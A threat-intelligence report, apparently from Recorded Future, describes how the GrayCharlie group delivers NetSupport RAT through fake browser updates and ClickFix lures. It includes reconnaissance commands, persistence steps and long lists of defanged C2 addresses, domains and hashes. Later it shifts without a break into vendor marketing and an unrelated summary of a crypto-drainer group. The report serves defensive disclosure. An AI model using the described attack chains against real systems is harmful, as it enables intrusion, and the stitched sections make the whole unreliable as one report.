GrayCharlie administers its staging infrastructure primarily over SSH, though other ports are used intermittently. The group manages its NetSupport RAT C2 servers over TCP port 443. Overall, Insikt Group assesses that GrayCharlie relies extensively on proxy services to administer its infrastructure. Additionally, based on presumed browsing activity from higher-tier servers, at least some individuals linked to GrayCharlie are assessed to be Russian-speaking.

Attack-Chain Analysis

GrayCharlie has been observed using two different attack chains to deliver NetSupport RAT. The first chain uses compromised websites to distribute a fake browser update that triggers the retrieval and installation of a script-based payload; the second chain uses compromised WordPress sites and a ClickFix-style lure that copies a command to fetch and install the RAT. Both culminate in NetSupport execution from %AppData%, Registry Run key persistence, and C2 connectivity; the technical details are expanded below.

Attack Chain 1: Fake Browser Update Leading to NetSupport RAT

According to public reporting, when GrayCharlie first became active in mid-2023, it relied on fake browser updates to deliver the NetSupport RAT. Although the group later shifted to the ClickFix technique, Insikt Group observed a return to fake browser updates as early as October 12, 2025. Figure 5 provides an overview of Attack Chain 1.

Figure 5: Attack Chain 1 (Source: Recorded Future)

1. Website compromise and lure delivery. Threat actors modify legitimate sites to load malicious scripts that render a browser-specific “update” prompt. Selecting the prompt initiates download of a ZIP “update” package containing a primary JavaScript file alongside decoy .dat files.
2. User-executed JavaScript loader. The victim manually runs the .js script. The script mimics a benign browser component to reduce suspicion while silently initiating the next stage of the attack.
3. PowerShell staging via WScript. The JavaScript launches wscript.exe, which spawns powershell.exe. PowerShell reaches out to a remote host to fetch an obfuscated JavaScript containing encoded tasking.
4. Secondary payload retrieval. PowerShell decodes instructions and downloads the actual payload ZIP archive. This archive contains a complete NetSupport RAT client set, including client32.exe and required DLLs.
5. File deployment and execution. The archive is extracted under the user profile (for example, %AppData%\Roaming\...). client32.exe is started in the background to minimize visible indicators to the user.
6. Persistence establishment. A Windows Run registry key is created to automatically launch client32.exe at logon, ensuring the NetSupport RAT remains active after reboots without requiring further user interaction.
7. C2 readiness. With the NetSupport RAT client running on the infected host, the endpoint is prepared to establish command-and-control connectivity with the attacker's infrastructure.

Attack Chain 2: WordPress Redirects and ClickFix Leading to NetSupport RAT

As early as April 2025, GrayCharlie began using ClickFix as a secondary attack chain, consistent with industry reporting that many threat actors have adopted ClickFix techniques due to their effectiveness. Figure 6 provides an overview of Attack Chain 2.

Figure 6: Attack Chain 2 (Source: Recorded Future)

1. Initial delivery and redirection. Phishing emails, malicious PDFs, or links on gaming sites direct users to compromised WordPress pages that embed attacker JavaScript.
2. Background script and profiling. A background script loads when the site is visited, injects an iframe, and profiles the environment (such as the operating system and browser) to deliver the next stage.
3. ClickFix fake CAPTCHA. The page presents a fake CAPTCHA that quietly copies a malicious command to the user’s clipboard and instructs them to paste it into the Windows Run dialog (Win+R), turning social engineering into user-assisted execution (see Figure 7).

Figure 7: Fake Captcha (Source: Elastic)

1. Command-driven staging. The pasted command retrieves a batch file that downloads a ZIP containing NetSupport RAT and uses PowerShell to extract it into %AppData%\Roaming\ (see Figure 8).

Figure 8: PowerShell command (Source: Cybereason)

1. NetSupport RAT launch and persistence. The batch file starts client32.exe and sets a Run registry key to automatically relaunch the NetSupport RAT client at startup, establishing persistence on the endpoint.
2. Remote access and follow-on actions. Once connected to C2, operators can interact with the system, perform reconnaissance (for example, domain group membership queries), transfer files, execute additional commands, and potentially move laterally using access acquired from the host.

Observed Operator Activity

In October 2025, Insikt Group detonated a NetSupport RAT sample (SHA256: 31804c48f9294c9fa7c165c89e487bfbebeda6daf3244ad30b93122bf933c79c) with the C2 server 5[.]181[.]156[.]234[:]443 linked to GrayCharlie within a controlled environment. Later that day, approximately three hours later, the threat actor connected using NetSupport RAT, compressed and moved two files, and then executed group and account reconnaissance commands. The same actor returned three days later and repeated the previously observed reconnaissance commands (see Figure 9).

net group /domain "Domain COmputers"
C:\Windows\system32\net1 group /domain "Domain COmputers"

Figure 9: Reconnaissance commands (Source: Recorded Future)

When both files were compressed into a single ZIP archive and the executable was detonated, the process sideloaded a DLL identified as Sectop RAT (SHA256: 59e7e7698d77531bfbfea4739d29c14e188b5d3109f63881b9bcc87c72e9de78) with the C2 server 85[.]158[.]110[.]179[:]15847. The executable (SHA256: 5f1bd92ad6edea67762c7101cb810dc28fd861f7b8c62e6459226b7ea54e1428) was identified as “Merge XML Files”, version 1.2.0.0, developed by Vovsoft, and was signed with a digital certificate that expired on October 31, 2025.

Mitigations

• Leverage the IoCs in Appendix A and Appendix B to investigate potential past or ongoing infections, both successful and attempted; Recorded Future customers can use the Recorded Future Intelligence Operations Platform to monitor for future IoCs associated with GrayCharlie.
• Monitor for validated infrastructure associated with the malware families discussed in this report, including NetSupport RAT and Stealc, as well as numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.
• Leverage the Sigma, YARA, and Snort rules provided in Appendices D, E, and F in your security information and event management (SIEM) or endpoint detection and response (EDR) tools to detect the presence or execution of NetSupport RAT. Customers can use additional detection rules available in the Recorded Future Intelligence Operations Platform.
• Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure.
• Use the Recorded Future Intelligence Operations Platform to monitor GrayCharlie, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.
• Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to your company. For example, if you want to stay informed about activities related to GrayCharlie, you can receive regular AI-generated updates on this threat actor.

Outlook

GrayCharlie has been operating for more than two years, and despite shifts in its tactics, such as alternating between fake updates and ClickFix techniques or transitioning from SmartApe to other hosting providers like MivoCloud, the group’s core behaviors have remained consistent. Given its sustained activity, GrayCharlie is highly likely to remain active and continue targeting organizations worldwide, with a current emphasis on US entities, as indicated by Recorded Future Network Intelligence.

Insikt Group will continue to closely monitor GrayCharlie to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.

Appendix A: Indicators of Compromise

Cluster 1 NetSupport RAT C2 IP Addresses:
5[.]181[.]159[.]60
5[.]252[.]178[.]23
5[.]252[.]178[.]123
94[.]158[.]245[.]13
94[.]158[.]245[.]63
94[.]158[.]245[.]66
94[.]158[.]245[.]81
94[.]158[.]245[.]104
94[.]158[.]245[.]111
94[.]158[.]245[.]115
94[.]158[.]245[.]118
94[.]158[.]245[.]131
94[.]158[.]245[.]135
94[.]158[.]245[.]137
94[.]158[.]245[.]140
94[.]158[.]245[.]174
185[.]163[.]45[.]30
185[.]163[.]45[.]41
185[.]163[.]45[.]61
185[.]163[.]45[.]73
185[.]163[.]45[.]87
185[.]163[.]45[.]97
185[.]163[.]45[.]130
185[.]225[.]17[.]74
194[.]180[.]191[.]17
194[.]180[.]191[.]51
194[.]180[.]191[.]168
194[.]180[.]191[.]171
194[.]180[.]191[.]189

Cluster 2 NetSupport RAT C2 IP Addresses:
5[.]181[.]159[.]9
5[.]181[.]159[.]38
5[.]181[.]159[.]112
5[.]181[.]159[.]139
5[.]181[.]159[.]140
5[.]181[.]159[.]142
5[.]181[.]159[.]143

Other NetSupport RAT C2 Servers:
5[.]181[.]156[.]234
5[.]181[.]156[.]244
5[.]181[.]159[.]29
5[.]181[.]159[.]62
5[.]252[.]177[.]15
5[.]252[.]177[.]120
5[.]252[.]178[.]35
94[.]158[.]245[.]153
94[.]158[.]245[.]170
185[.]163[.]45[.]16
194[.]180[.]191[.]18
194[.]180[.]191[.]121
194[.]180[.]191[.]209

NetSupport RAT Hashes:
06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268
0e9df9294c36702eee970efcb4a70b6ddb433190ab661273e2e559185c55b6c1
112bf17e7c0d0695e9229d60f0d2734c6b96d7edfb41ea3e98e518f4fb1ae6e9
11370e108c8e7a53e52f01df0829c8addb5833145618a7701fbedbb1d837a43d
15dfe9d443027ba01b8f54f415fd74d373b3a06017db8ef110fb55b33357b190
16c8b5e10135d168d73a553a4bda51628e5b4fd419c0ecd47ca4cd7aa864ebd5
18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
1900ca9b482273df3127e221526023c025808d8fd65769a418fe1f346e7d41e2
1c389bf1859a00c58b6a97c02fc26c2fe9766c43e06242a94e92b6585b62398b
21a24922b29742977c4f7e25dd2be056dc02bc5e70c98e32ec3e0c6206f4d9ef
312a0e4db34a40cb95ba1fac8bf87deb45d0c5f048d38ac65eb060273b07df67
31804c48f9294c9fa7c165c89e487bfbebeda6daf3244ad30b93122bf933c79c
31f69d67eca6f3fc837e8d10dff4e2fb6643e33c118cff87df4fee2b183bf0e0
37e8b57ff4d724053b1917dc6edaca0708d44ceecd00cab7e4cabb336c2868d7
3ac57bea954ce68dc937f6954ae8a6a19a367a579aeeda7cc93ddd5968fae250
3ada20fbd80ec7f536db8303a5fa029af741a6914de61376ac8f81ac3ac728fd
3b5658532bc4058131689c5641def85d7ae25d5b837d3d1aff3af7bb25581f17
3c499faac4b973c237670f046973691a245ecd735ffebcca3e93337d94b71cde
3c4b87be8450e3120b7ad2b11ff59850950beb39906dc1636b3ee7b6390f2086
4732f025a2a69f6c40787854c5da122689702f00f4f423061bb30ab7fa1e98d3
5381b2a7a77448c4908f5c79d21631f56c88ead0365981cac1dcaafe493c313e
53e9511401000f61c9d910b92cd6d5a58e38ae541975135944885e53fa91ecb7
5dfbd8cf98ebd4977d4f240dcabd5cd67b936c0095c2d5b9a77896daea877df6
5eebdb584a1acd6aacc36c59c22ec51bbd077d2dbbe0890b52e62fa6fb9cf784
5ff742e134e3d17ec7abea435f718e8f5603b95e7984e024b2310ac9ef862ddf
60ff43424c0ba9dc259ab32405345ef325a4cb4d0baf0c0b0c13f9d3672e99eb
68c6411cc9afa68047641932530cf7201f17029167d4811375f1458cae32c7bd
6b2c41b42f75e64d435ba56c2f2b6d79a11b862a2d994487dab3e51e298bc5c9
6b93b7372941a09f1ea69f8b71c5c4e211ea0f8a24061e702002ca84457bcddd
6d0857a9c77f9c5f2a5e6921e1cb9f7e1a5d6b947ad63b364d291157d3f840fb
70f3a6fdbbc5e2ae79c28b48b6478ee3c8ea6f2b705ca9dc9bf8e63a4f6e0c8d
72baf2ecb0a9df607e54b64c0925ffc6739ab5a8b18900bf5c1930bcc799395d
748d546c6db44f6aa4bbb8e586d79f56c63fa87580eb19a0f2d5079cbe0952b7
79040421b5a48dcc6e611dfe187b2f3e355791ad8511adb84f5c0948aa1d6c89
797ae2dbb2c538710fefe75dbe380b9f55b614cb03c4ae09bb3172e8234dd9d9
7a73ae8cca6ce6fa88f89d6154811cb453d6e6db9fa8ed5fbdaf8895aae601a5
7b19538dcf6d4bb84590c458f09c5707c8db53a42861fa56533c49c1a3acd953
7e3634bfd66e601d7585b237437f11f7d614b33705ba5f7bd75ab176c8250d38
858dfa529b960c6f6226b53beb55ba1900d3f498ba7be40724ed5c16d7d5a44b
871e5629d9c8898babf3ed579586e3f5f94a6c4623d3a0a7f9a99bf9d95ffc7b
8763749fd09245e7fa8c0ee2cc797d5520a9ef5d6846f044a0cd7c969c4bd7d4
89d839bbdc786c006304f3c6c6939150380aaa9e84d82bc31cdf0cf7609a6243
8b21fbd40c89763f51d5e06680c0971623500f4724c25958446bac794797057b
8baebd525324297faf86639266060172ded963767c832a609a991fa92c8463ab
8d1ed904d90e08048f42cdc9a25c2159f0f8dc4aa9dc01b0207645ea53abe189
957ab8417606ad41ad31f006d997af3f647dd5215af899551d08b3b472a4bc85
a0332fe0baa316fe793e757f9cf5938b099e97dc4624ead6f3bad8555c8a419b
a1482e62ecc89696a75adea7052c2e98a75c9d37304723abd110d60962bafdb7
a28d0c82a2a37462c2975b5eda7f91e8fc3c2ed50abfe357948ec4faabbd4951
a6637685091835826e62af279cc6c648188797f9edc05a2399a6686349102774
a6f1f68827303e655488c8d54b3be3ce8b1097f3ff374a2e4bc82ff96812781c
abc5b2118bc1d8c82f3726a5e30cf22ae3fa1c572dd3327b281ea6fd97ae9c06
afc45cc0df7f7e481bff45c6f62a6418b6ae4c8b474ec36113e05ab7ca7e2743
b1f91355a8472e364e07f05dc69bbd9c74dc1943e9c4475f46c2b448bb6d6e5d
b2b7218c3f649b9077510aac309357e884c314e0f488abed391415defb249f4c
b6b685fe020c481161060df9dbef0fc205cde479056c18aaeae184daa3f8a9c0
b784301cb2edafea875f779cf24e018f06732561069f6c4c3d86548029671642
ba557bd6b2c1d3297b2c9bd7294e47b9ad9ec6a937cddc879dd563c61a9abcbd
bb451151e52f0868f98e32d26ffa7c2be412b47cd470bf90d3cfe777b4a19f85
bd39f32177dc7a20f5087c5460ebf589035d9051336c69f07a26398f76aec40e
bf37542e9eb7a3b2f51d107e56d7551e6248f06ce18918e3dda2ebe9da1b0e80
bf97c4ff35b5e2c039aa1f1a9a164b7ec4d9339a631c84910b9a4d03b7927b8a
c2ba0018de8dcf0abfb2669cce95ed09377e9a9da7ff8e74e95688c99a025634
c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e
c441afb337c4803eed20ae255fbad3cdfac2800475c51e00a55369909efb4c89
cc6ad344d30178e04e49ab16cd43744925676562aded051835fb3f73401f31fa
ceab18331f785d0bf215f551b90f00567e36d339ba8e3ed8e45c0ad410b25808
d02a1eb597c66b602ac7d55095f771345ff5e90905ea12e523df2095030752b6
d6142f48664208710bab9fcab8dfcda66ad75ad756d2ce9c3aa243dcbc29bf4a
d665a8547baf067f2216821ecd4145eab1c75868f024d09140fb265b819d5194
d8d2092e174240d7bac63a9e1c199b442e1cb0f39d7fa32510b1aa7717c3ae38
e24de02415946133176b66017d54a5dcd7270c83f5ef01d79faff4e64d13c63b
e5502722c2bb84876903549445534c47cdaa586a0bb1e5b3a53162d75cc6cb28
e66ae0ac443b5140a1b35b5aaa6899eea296d9d633988eb044a395a34a887431
e92e01977d85f6834f57bd09e29e654b10da798844e4a64470cb22dac78bef93
e9723a2a9ca45787c35b864605a6be71ccf12b2d96dad8e7fc39117f7ba29abb
f28bb7bc5c801d5444ba6816e3a91d5bfaf0307578b7a1529415fc220fd9e9e8
f86b6aa11a276c24dd80db48f43c8a2f0c8df6e5426a7a0fee322c0427421ebb

“Type 1” Staging Server IP Addresses:
77[.]83[.]199[.]3
77[.]83[.]199[.]15
77[.]83[.]199[.]31
77[.]83[.]199[.]42
77[.]83[.]199[.]73
77[.]83[.]199[.]82
77[.]83[.]199[.]88
77[.]83[.]199[.]90
77[.]83[.]199[.]112
77[.]83[.]199[.]123
77[.]83[.]199[.]132
77[.]83[.]199[.]142
77[.]83[.]199[.]170
79[.]141[.]160[.]24
79[.]141[.]160[.]34
79[.]141[.]161[.]50
79[.]141[.]161[.]171
79[.]141[.]162[.]35
79[.]141[.]162[.]37
79[.]141[.]162[.]50
79[.]141[.]162[.]132
79[.]141[.]162[.]149
79[.]141[.]162[.]169
79[.]141[.]162[.]177
79[.]141[.]162[.]181
79[.]141[.]162[.]187
79[.]141[.]162[.]204
79[.]141[.]162[.]229
79[.]141[.]163[.]138
79[.]141[.]163[.]176
79[.]141[.]172[.]204
79[.]141[.]172[.]223
79[.]141[.]172[.]229
79[.]141[.]172[.]232
79[.]141[.]172[.]240
79[.]141[.]173[.]60
79[.]141[.]173[.]161
79[.]141[.]173[.]168
85[.]158[.]111[.]29
85[.]158[.]111[.]38
85[.]158[.]111[.]53
85[.]158[.]111[.]75
85[.]158[.]111[.]81
85[.]158[.]111[.]126
89[.]46[.]38[.]34
89[.]46[.]38[.]48
89[.]46[.]38[.]88
89[.]169[.]12[.]48
91[.]193[.]19[.]32
91[.]193[.]19[.]64
91[.]193[.]19[.]78
91[.]193[.]19[.]127
91[.]193[.]19[.]163
91[.]193[.]19[.]188
91[.]193[.]19[.]190
98[.]142[.]240[.]165
98[.]142[.]240[.]188
98[.]142[.]240[.]214
98[.]142[.]240[.]221
98[.]142[.]240[.]246
98[.]142[.]251[.]26
98[.]142[.]251[.]32
98[.]142[.]251[.]42
98[.]142[.]251[.]53
185[.]33[.]84[.]131
185[.]33[.]84[.]153
185[.]33[.]84[.]169
185[.]33[.]85[.]20
185[.]33[.]85[.]26
185[.]33[.]85[.]33
185[.]33[.]85[.]38
185[.]33[.]85[.]52
185[.]33[.]86[.]37
193[.]42[.]38[.]11
193[.]42[.]38[.]79
193[.]42[.]38[.]85
193[.]42[.]38[.]86
193[.]111[.]208[.]2
193[.]111[.]208[.]17
193[.]111[.]208[.]19
193[.]111[.]208[.]23
193[.]111[.]208[.]24
193[.]111[.]208[.]46
193[.]111[.]208[.]75
193[.]111[.]208[.]97
193[.]111[.]208[.]100

Additional IP Addresses Likely Linked to “Type 1” Staging Infrastructure:
23[.]140[.]40[.]66
45[.]153[.]191[.]245
46[.]29[.]163[.]28
89[.]169[.]12[.]48
89[.]253[.]222[.]25
89[.]253[.]222[.]156
95[.]182[.]123[.]86
185[.]231[.]245[.]158
217[.]114[.]15[.]253

“Type 2” Staging Server IP Addresses:
45[.]61[.]134[.]76
77[.]83[.]199[.]162
79[.]141[.]162[.]135
79[.]141[.]163[.]169
91[.]193[.]19[.]220
144[.]172[.]115[.]211
172[.]86[.]90[.]84
185[.]33[.]86[.]11
185[.]80[.]53[.]79
194[.]15[.]216[.]118

“Type 2” Staging Server Domains:
filmlerzltyazilimsx[.]shop
foolowme[.]com
joiner[.]best
lowi1[.]com
morniksell[.]com
persistancejs[.]store
pomofight[.]com
port4loms[.]com
signaturepl[.]com
yungask[.]com

Domains Linked to oreshnik[@]mailum[.]com:
108zhao[.]shop
1sou[.]top
6hms[.]top
789pettoys[.]shop
7serv[.]top
99wc[.]top
abocamuseum[.]icu
actionmovies[.]top
alcmz[.]top
alhasba[.]com
amxdh1[.]icu
anoteryo[.]top
arearugs[.]top
as5yo[.]top
ashesplayer[.]top
avodaride[.]top
azyaamode[.]shop
baihao[.]shop
baihuah[.]top
bedoueroom[.]top
bestproductreviews[.]xyz
bestrollerballpen[.]top
blogdojhow[.]com
bnpparibas[.]top
bokra[.]top
bond007[.]xyz
boxworld[.]top
bstionline[.]com
buildingjobs[.]xyz
buscavuelosbaratos[.]top
buyedmeds[.]top
buylisinopril[.]top
celebrex[.]top
chaojiwang[.]top
chenyiwen[.]top
chinapark[.]top
christianlouboutin2017[.]top
cialissale[.]top
cinselurunler[.]xyz
coinseasygenerator[.]top
couterfv[.]top
couturella[.]shop
covaticonstructioncorp[.]shop
cozartan[.]top
cryptohardware[.]shop
dcdh4[.]shop
dealermobil[.]top
depechemode[.]shop
directoryframework[.]top
discountmontblanc[.]top
discoveronline[.]top
doodstream[.]shop
downloadfreak[.]top
erectilehelp[.]top
filmezz[.]top
filmlerzltyazilimsx[.]shop
fjs95[.]shop
fmovies123[.]top
forging[.]top
fragzone[.]top
franquicias[.]top
fuckhdmov[.]top
gededewe[.]shop
getin[.]top
glitterygadgets[.]shop
gmartph[.]shop
gmt-a[.]shop
grandzxc[.]bet
guosong[.]top
haidao10[.]top
headtechnologies[.]xyz
healthcareplans[.]top
heim-k[.]shop
helperection[.]top
hilfe-ed[.]top
hirek[.]top
howtogetaloan[.]top
ida-ci[.]com
islighting[.]top
iwine[.]top
izone[.]digital
jerseysus[.]top
jiezishijie[.]top
jkse[.]shop
jsmakert[.]shop
k2bsc[.]top
kaestner[.]top
kamagrafr[.]icu
kanshuwang[.]top
kazumaka[.]top
kfzversicherungskosten[.]top
khusinhthaidanphuong[.]top
kingdomholding[.]top
krediteonlinevergleichen[.]top
lang3666[.]top
langwonet[.]top
layardrama21[.]top
lebensversicherungvergleich[.]top
levciavia[.]top
linhua97[.]top
linksoflondononsale[.]top
linksoflondonsale[.]top
liruo[.]top
liveskortv[.]shop
loanonline[.]top
loispaigesimenson[.]com
losartan[.]top
lovedou[.]top
lqsword[.]top
lx7v9[.]top
lycosex[.]top
machine-a-plastifier[.]com
manwithedhelp[.]top
marmocer[.]top
mbpen163[.]top
medicamentsbonmarche[.]top
meimei68[.]top
menjimmychooonline[.]top
milebox[.]shop
mindsetgrowth[.]shop
mm37[.]icu
monclerjackets[.]top
moruk[.]xyz
motocyclenews[.]top
moviefone[.]top
moviesone[.]top
movtime76[.]shop
movtime78[.]shop
musicdownloader[.]top
my-privatebanker[.]top
mybeststream[.]xyz
nackt-bilder[.]top
nana44[.]shop
newbalancesport[.]top
palcomp3[.]top
parisforrent[.]top
pasangiklan[.]top
patekphillipwatches[.]top
pielsteel[.]top
pravaix[.]top
rag382[.]top
rasin[.]shop
refanprediction[.]shop
regopramide[.]top
rnsddse[.]top
sales2016[.]top
sdnews[.]top
searchgo[.]shop
searchweb[.]top
semikeren[.]icu
simvascor[.]icu
simvascor[.]top
snapcans[.]top
sneakermall[.]top
soap2dayfree[.]top
socialsignals[.]shop
socksforrocks[.]shop
streaming-films[.]xyz
syavsp5[.]top
tdsc[.]top
techradar[.]top
tiffanyearringforwomen[.]top
todoarmarios[.]top
todocalefactores[.]top
todocarritos[.]top
travelplace[.]top
trendings[.]top
universaltechnology[.]top
uochut[.]shop
via345[.]top
villahome[.]top
viloriterso[.]icu
viptravelcentres[.]com
vog168[.]top
wandan[.]top
wap9[.]top
warpdrive[.]top
watchesbest[.]top
wavob[.]top
wdwnp[.]top
xelesex[.]top
ydh7[.]shop
yntz6[.]shop
yourcialsupply[.]top
youtubevideo[.]top
yxta[.]top
yybvf[.]top
zaheirx[.]shop
zakachka[.]top
zerolendnow[.]top
zt45gg[.]top

Compromised Law Firm Websites:
bianchilawgroup[.]com
brattonlawgroup[.]com
brighterdaylaw[.]com
defensegroup[.]com
dwicriminallawcenter[.]com
fisherstonelaw[.]com
jarrettfirm[.]com
raineyandrainey[.]com
rbbfirm[.]com
rmvlawyer[.]com
www[.]brentadams[.]com
www[.]cfblaw[.]com
www[.]gerlinglaw[.]com
www[.]immigration-defense[.]com
www[.]schwartzandschwartz[.]com

Sectop RAT Hash:
59e7e7698d77531bfbfea4739d29c14e188b5d3109f63881b9bcc87c72e9de78

SecTopRAT C2 IP Address:
85[.]158[.]110[.]179[:]15847

Other Hashes:
5f1bd92ad6edea67762c7101cb810dc28fd861f7b8c62e6459226b7ea54e1428

Email Address Linked to GrayCharlie:
oreshnik[@]mailum[.]com

Security teams are drowning in threat intelligence feeds. Hundreds of vendors promise comprehensive coverage, real-time alerts, and actionable insights. Yet sophisticated adversaries continue to operate undetected, incidents take weeks to scope, and attribution remains elusive.

The fundamental issue isn't quality but control. Traditional network visibility solutions force passive consumption: their alerts, their priorities, their timeline. This one-size-fits-all approach assumes threats targeting financial services match those facing critical infrastructure, or that yesterday's patterns predict tomorrow's campaigns.

Network intelligence flips this model. With global visibility spanning billions of connections across 150+ sensors in 35+ countries, you can investigate what matters to your organization using your own selectors, questions, and mission requirements.

What Network Intelligence Actually Means

Effective network intelligence requires global visibility at scale: distributed sensors across dozens of countries processing billions of packets daily, generating tens of millions of network flow records. But collection methodology matters equally. Metadata-only approaches capture source and destination IPs, ports, protocols, flow counts, and timestamps without payloads or deep packet inspection. This enables operation at internet scale while better maintaining ethical boundaries and data minimization standards.

At Recorded Future, our network intelligence capabilities provide this access to such global network traffic observations for specific IP addresses of interest. Our Insikt Group uses this same infrastructure to research 500+ malware families and threat actors. Government CERTs use these capabilities to analyze adversary infrastructure at national scale.

What This Means in Practice

Consider what changes when your security operations can query global network intelligence.

Faster SOC Triage

Your team flags a suspicious IP at 2 AM. Instead of guessing whether it's noise or the start of something worse, query the network intelligence platform. See its global communication patterns instantly. Understand whether you're looking at commodity scanning or infrastructure that's been quietly staging against targets for weeks. Internet scanner detection capabilities automatically classify the behavior and reveal specific ports targeted, web requests made, and geographic distribution. Triage in minutes, not hours.

Targeted or Opportunistic? Now You'll Know

When threats hit your industry, the first question is always: are we specifically in the crosshairs, or is this spray-and-pray? Network intelligence lets you track adversary infrastructure across your sector before it reaches your perimeter. See the pattern. Understand the targeting. Brief leadership with confidence because you're no longer guessing. You're showing them the actual traffic patterns that prove whether your organization is in the crosshairs or caught in the spray.

Fraud Infrastructure Exposed

Fraud campaigns depend on infrastructure that moves fast but leaves traces. Your selectors, run against global network intelligence, can reveal the networks behind credential stuffing, account takeover, and payment fraud before the campaign fully scales.

Attribution That Actually Holds Up

Mapping adversary infrastructure is hard. Connecting it to broader campaigns and ultimate operators is harder. Network intelligence gives you the longitudinal visibility to trace how infrastructure evolves, clusters, and connects. Administrative traffic analysis reveals patterns operators use to manage C2 infrastructure. When you identify admin flows from a common source connecting to multiple C2 servers, you're mapping the operator's pattern based on observed behavior across hundreds of global vantage points. You're turning indicators into intelligence.

Integration Into Security Workflows

Network intelligence integrates directly into existing security workflows through API access to SIEMs, SOAR platforms, and custom analysis tools. When your SIEM flags suspicious traffic, automated queries reveal global context: Is this IP conducting C2 communications? Scanning your sector specifically? Connected to infrastructure from last month's campaign? Curated threat lists reduce noise from legitimate security research while enabling early blocking of targeted reconnaissance, turning your existing tools into instruments for active investigation rather than passive alerting.

When Expertise Becomes Essential

For organizations facing persistent, sophisticated adversaries, network intelligence capabilities alone aren't sufficient. The difference between having access to global network visibility and operationalizing it effectively comes down to tradecraft.

Recorded Future's Global Network Intelligence Advisory program addresses this by pairing technical capabilities with forward-deployed analysts and embedded engineers who work directly inside your SOC or intelligence fusion center. This becomes especially critical when nation-states are mapping your critical infrastructure, when advanced persistent threats are staging for long-term access, or when attribution could influence strategic decision-making. You need the ability to investigate specific questions with global visibility and the expertise to interpret what you find.

The Compliance Framework That Enables Trust

Network intelligence operates under strict ethical and legal guidelines. All use is subject to our Acceptable Use Policy and surveillance, profiling of individuals, or political targeting is prohibited. Access is invitation-only, requiring vetting and agreement to specific terms of use.

These aren't just policies but foundational to how this capability operates. The metadata-only collection model, the data minimization approach, and the geographic distribution that prevents any single point of visibility into user communications are design choices. These constraints aren't obstacles to effectiveness but enablers of trust. They allow powerful intelligence capabilities to exist while promoting appropriate boundaries.

Moving Forward

The gap between what most security programs need and what traditional threat intelligence provides continues to widen. Adversaries operate at scale, evolving infrastructure faster than feeds can update. Internal telemetry shows only what touches your perimeter. Point-in-time observations lack the context to distinguish targeted attacks from noise.

Network intelligence addresses this gap with the ability to query global visibility using your own selectors. At Recorded Future, we've developed capabilities that operate at this scale, with the compliance framework and operational expertise to make them effective. For organizations ready to move beyond pre-packaged feeds, we're offering these capabilities to select customers through an invitation-only program.

What matters now is recognizing that your questions matter more than their answers and building security programs that reflect that reality.

The global threat landscape didn't simplify in 2025; it shattered. Geopolitical alliances strained. Criminal enterprises splintered under law enforcement pressure, then regrouped into smaller, faster, and harder-to-track operations. State-sponsored cyber actors shifted from dramatic disruptions to quiet pre-positioning, embedding themselves in networks and waiting. Hacktivist groups and influence networks amplified conflicts, blurring the line between genuine intrusions and perception warfare.

But here's what makes this moment dangerous: as long-established norms unwind, fragmentation is paradoxically enabling greater interoperability across domains that were once distinct. State objectives, criminal capability, and private-sector technology increasingly reinforce one another. That convergence creates uncertainty, compresses warning time, and expands plausible deniability.

Today, Recorded Future's Insikt Group releases the 2026 State of Security report, our most comprehensive annual analysis of the forces shaping global security.

Drawing on proprietary intelligence, network telemetry, and deep geopolitical analysis, this report examines how 2025's fractures are reshaping the threat environment — and what security leaders must prepare for in the year ahead.

The End of Stability as a Baseline Assumption

Figure 1: 2025 redefined international relations (Source: Recorded Future)

Insikt Group has identified a major cybercriminal operation specializing in large-scale cryptocurrency theft, operating under the moniker “Rublevka Team”. Since its inception in 2023, the threat group has generated over $10 million through affiliate-driven wallet draining campaigns. Rublevka Team is an example of a “traffer team,” composed of a network of thousands of social engineering specialists tasked with directing victim traffic to malicious pages. Unlike traditional malware-based approaches such as those used by the traffer teams Marko Polo and CrazyEvil (previously identified by Insikt Group, both of which distributed infostealer malware), Rublevka Team deploys custom JavaScript scripts via spoofed landing pages that impersonate legitimate crypto services, tricking victims into connecting their wallets and authorizing fraudulent transactions. Their infrastructure is fully automated and scalable, offering affiliates access to Telegram bots, landing page generators, evasion features, and support for over 90 wallet types. By lowering the technical barrier to entry, Rublevka Team has built an extensive ecosystem of global affiliates capable of launching high-volume scams with minimal oversight.

This structure poses a growing threat to cryptocurrency platforms, fintech providers, and brands whose identities are being impersonated. Organizations that facilitate blockchain transactions, particularly fintech firms, exchanges, or wallet providers, face elevated reputational and legal risks if customers fall victim to these scams. Even if the victim’s compromise occurs outside a firm’s platform, failure to detect spoofed landing pages or fraudulent referrals can trigger consumer backlash, loss of trust, or regulatory scrutiny around customer protections and Know Your Customer (KYC) enforcement. The threat group’s agility — evidenced by its use of frequently rotating domains, targeting lower-cost chains like Solana (SOL), and exploiting Remote Procedure Call (RPC) APIs — undermines traditional fraud detection and domain takedown efforts. Their model mirrors ransomware-as-a-service (RaaS) operations, signaling a continuation of the broader shift toward scalable, service-based cybercrime that organizations must proactively monitor, disrupt, and defend against to protect customers and maintain trust.

Key Findings

• The objective of a Rublevka Team scam is to create an attractive SOL-based offer, such as a promotion or an airdrop event, generate traffic to the lure via social media or advertisements, and trick a user into connecting their wallet to the website and signing a transaction that drains their wallet.
• As of writing, Rublevka Team’s primary Telegram channel has approximately 7,000 members. Over 240,000 messages have been posted to Rublevka Team’s automated “profits” channel, indicating at least 240,000 successful wallet drains, with transactions ranging from $0.16 to over $20,000.
• Rublevka Team offers a custom JavaScript drainer embedded into their landing pages, which exfiltrates victims’ SOL assets by draining held tokens. The drainer is compatible with over 90 SOL wallet types.
• The threat group’s infrastructure is fully automated via Telegram bots, offering affiliates tools for landing page creation, campaign tracking, cloaking, and distributed denial-of-service (DDoS) protection.
• The drainer campaign, active since 2023, leverages spoofed versions of legitimate services such as Phantom, Bitget, and Jito to maximize user trust and conversion

• Recorded Future deployed Autonomous Threat Operations within its own SOC before customer release, ensuring real-world effectiveness and identifying critical capabilities.
